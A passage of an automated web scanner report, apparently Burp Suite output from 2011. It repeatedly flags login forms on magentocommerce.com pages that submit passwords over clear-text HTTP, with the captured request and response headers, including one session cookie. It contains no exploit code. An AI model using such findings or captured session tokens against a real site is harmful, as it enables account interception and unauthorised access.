Path:   /media/interviews/timeout-online/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.71. http://www.magentocommerce.com/media/interviews/tvonics/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.72. http://www.magentocommerce.com/media/interviews/wander/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.73. http://www.magentocommerce.com/media/interviews/wearport/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.74. http://www.magentocommerce.com/media/interviews/wkf-communications/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.75. http://www.magentocommerce.com/media/screencasts  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.76. http://www.magentocommerce.com/media/screencasts/adding-related-products/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.77. http://www.magentocommerce.com/media/screencasts/community-groups/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.78. http://www.magentocommerce.com/media/screencasts/configurable-products/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.79. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/configuring-tier-pricing/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176151; expires=Sat, 11-Aug-2012 15:09:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:11 GMT
Content-Length: 34931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.80. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/content-staging-and-merging/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176016; expires=Sat, 11-Aug-2012 15:06:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:56 GMT
Content-Length: 33289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.81. http://www.magentocommerce.com/media/screencasts/currency/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/currency/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176054; expires=Sat, 11-Aug-2012 15:07:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:35 GMT
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.82. http://www.magentocommerce.com/media/screencasts/data-exporting/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/data-exporting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176046; expires=Sat, 11-Aug-2012 15:07:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
